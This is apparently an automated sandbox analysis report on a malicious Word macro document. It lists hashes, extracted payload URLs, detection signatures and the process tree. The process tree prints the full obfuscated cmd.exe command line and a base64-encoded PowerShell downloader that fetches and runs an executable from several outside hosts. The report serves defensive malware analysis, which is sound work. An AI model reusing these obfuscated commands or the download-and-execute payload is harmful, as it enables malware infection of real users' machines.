Analysis
-
max time kernel
137s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
-
submitted
21-05-2024 14:09
General
-
Target
6390ace810631b6f1e2af1453811ee01_JaffaCakes118.doc
-
Size
77KB
-
MD5
6390ace810631b6f1e2af1453811ee01
-
SHA1
73c195d807ac0295d261ca1e28bbf3651e7f9b54
-
SHA256
ee339ff1295cc89c436d68bc87a3493120d83ee407932ef5b3322d963f1c236f
-
SHA512
eb4d70fac30a168790c4d738f349935fdbe2b030b22d1f5e6f945ebd7b7b12f4f6bd8b096f68291b4982ebd6c84d2b953094d6d126b32c7964ab7cbd9ac9aa89
-
SSDEEP
1536:IptJlmrJpmxlRw99NBZ+a5VuB2DZrVeoBE:Qte2dw99fRuBYZrom
Malware Config
Extracted
http://arkanddove.com/7Ts
http://bearinmindstrategies.com/JZ2d
http://bluemoonweather.org/tcp
http://boczon.pl/Z
http://antallez.com/Ct
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Blocklisted process makes network request 4 IoCs
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Enumerates system info in registry 2 TTPs 3 IoCs
-
Suspicious behavior: AddClipboardFormatListener 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of SetWindowsHookEx 7 IoCs
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\6390ace810631b6f1e2af1453811ee01_JaffaCakes118.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\Cmd.exeCmd /V^:/C"^se^t P^Y==^=^A^A^g^A^A^I^AACA^gA^A^I^A^AC^A^g^AAIA^AC^AgA^A^IA^AC^A^gA^A^I^A^ACA^g^A^A^I^A^0^H^A9^Bw^e^Ag^GAjBAd^AEGA^jBQ^fAs^D^ArBQ^YA^U^G^A^y^B^g^Y^As^DA6B^w^aAw^G^AkA^A^IA0^GA^lB^A^d^AkEA^tAQZ^A^s^G^Av^Bg^d^A^4^GA^J^Bw^O^AkC^A6B^w^aAwG^A^k^A^A^IAwC^ABB^A^aA^U^EAk^A^A^K^AUGAs^BQ^aAYEA^kBQ^Y^A^8GA^s^BgbAcHAv^BARA^4CA6B^AV^AE^HAkA^w^eAkHAyB^A^dAsH^A^p^A^wcAo^HAhB^AJA^AC^Au^B^QaAAC^A^B^BAa^A^UE^A^kA^AK^A^g^G^AjBQ^YAU^G^AyB^w^bAYG^A7AwJ^A^U^G^A^4^BQZ^A^4CAn^A^wK^A^gFAPBAU^A^QCArAw^JAwF^An^Aw^KA^MG^A^pB^Ab^AI^GA^1B^AcA^oD^A^2^Bg^b^AU^GAkAQP^Ao^H^Ar^B^A^bAQCA^7A^w^J^A^Y^DA4^A^gN^AcC^A^gA^QP^A^AC^AYB^w^T^AA^FA^k^AwOAkC^An^A^AQ^AcCAo^A^A^dA^kG^A^s^BAcAMF^AuA^wJ^AQHA^D^BwLA^0^G^AvBw^YA^4C^A^6^B^QZ^AwG^AsBQ^YA^QHAu^B^QYA8C^AvAg^OAAHA0B^Ad^Ag^G^A^A^B^g^WA^8C^As^B^AcA4C^Au^B^wbAo^H^AjB^wbAIGAvA^wL^A^oD^A^w^BA^dA^Q^H^AoBAQ^A^A^H^A^j^B^A^d^A8C^AnB^gcA^8^GA^uA^gc^AU^G^A^oBAdA^EGA^l^B^wdA^4^GAvB^wbA0^GA^l^B^QdAw^G^A^i^B^wLA8CA6A^Ac^A^Q^HA0BAa^AA^EA^kBg^MAoFA^KB^wLA0^G^AvB^w^Y^A^4C^Az^BQZ^AkGAn^B^Q^ZA^Q^H^A^hBgc^A^Q^HAz^B^A^ZA^4GA^pBQ^b^A4^GAp^B^gc^A^E^G^A^l^B^g^Y^A8CAv^Ag^O^AAH^A^0BA^dAgG^AAB^wc^A^QFA3^AwL^A^0^GAvB^w^Y^A4CA^lBgd^A^8^GA^k^BA^Z^A4^G^A^h^BwaA^IHAhBwLA8CA^6A^AcA^Q^HA^0^BAaAcCA9A^wcAo^HAh^B^AJ^As^D^A^0^Bg^bA^UG^ApBA^b^A^M^E^AiBQ^Z^AcF^AuA^A^dAU^GAOBAI^AQHA^jB^Q^ZA^o^GAi^B^w^bA^0C^A^3B^QZA4GA^9^A^ge^AQFAx^BA^J e^- lle^h^sr^e^w^o^p&&^f^or /^L %^u ^in (^90^9^,-^1^,^0)^d^o s^e^t ^2^uf^3=!^2^uf^3!!P^Y:~%^u,1!&&^if %^u==^0 c^al^l %^2^uf^3:^~^6%"2⤵
- Process spawned unexpected child process
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e JABxAFQAegA9AG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABhAHoAcwA9ACcAaAB0AHQAcAA6AC8ALwBhAHIAawBhAG4AZABkAG8AdgBlAC4AYwBvAG0ALwA3AFQAcwBAAGgAdAB0AHAAOgAvAC8AYgBlAGEAcgBpAG4AbQBpAG4AZABzAHQAcgBhAHQAZQBnAGkAZQBzAC4AYwBvAG0ALwBKAFoAMgBkAEAAaAB0AHQAcAA6AC8ALwBiAGwAdQBlAG0AbwBvAG4AdwBlAGEAdABoAGUAcgAuAG8AcgBnAC8AdABjAHAAQABoAHQAdABwADoALwAvAGIAbwBjAHoAbwBuAC4AcABsAC8AWgBAAGgAdAB0AHAAOgAvAC8AYQBuAHQAYQBsAGwAZQB6AC4AYwBvAG0ALwBDAHQAJwAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAFAATwBYACAAPQAgACcANgA4ADYAJwA7ACQAbABrAHoAPQAkAGUAbgB2ADoAcAB1AGIAbABpAGMAKwAnAFwAJwArACQAUABPAFgAKwAnAC4AZQB4AGUAJwA7AGYAbwByAGUAYQBjAGgAKAAkAEUAaABBACAAaQBuACAAJABhAHoAcwApAHsAdAByAHkAewAkAHEAVAB6AC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAkAEUAaABBACwAIAAkAGwAawB6ACkAOwBJAG4AdgBvAGsAZQAtAEkAdABlAG0AIAAkAGwAawB6ADsAYgByAGUAYQBrADsAfQBjAGEAdABjAGgAewB9AH0AIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
262KB
MD551d32ee5bc7ab811041f799652d26e04
SHA1412193006aa3ef19e0a57e16acf86b830993024a
SHA2566230814bf5b2d554397580613e20681752240ab87fd354ececf188c1eabe0e97
SHA5125fc5d889b0c8e5ef464b76f0c4c9e61bda59b2d1205ac9417cc74d6e9f989fb73d78b4eb3044a1a1e1f2c00ce1ca1bd6d4d07eeadc4108c7b124867711c31810
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
136KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
4KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
2.0MB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
64KB
-
Filesize
2.0MB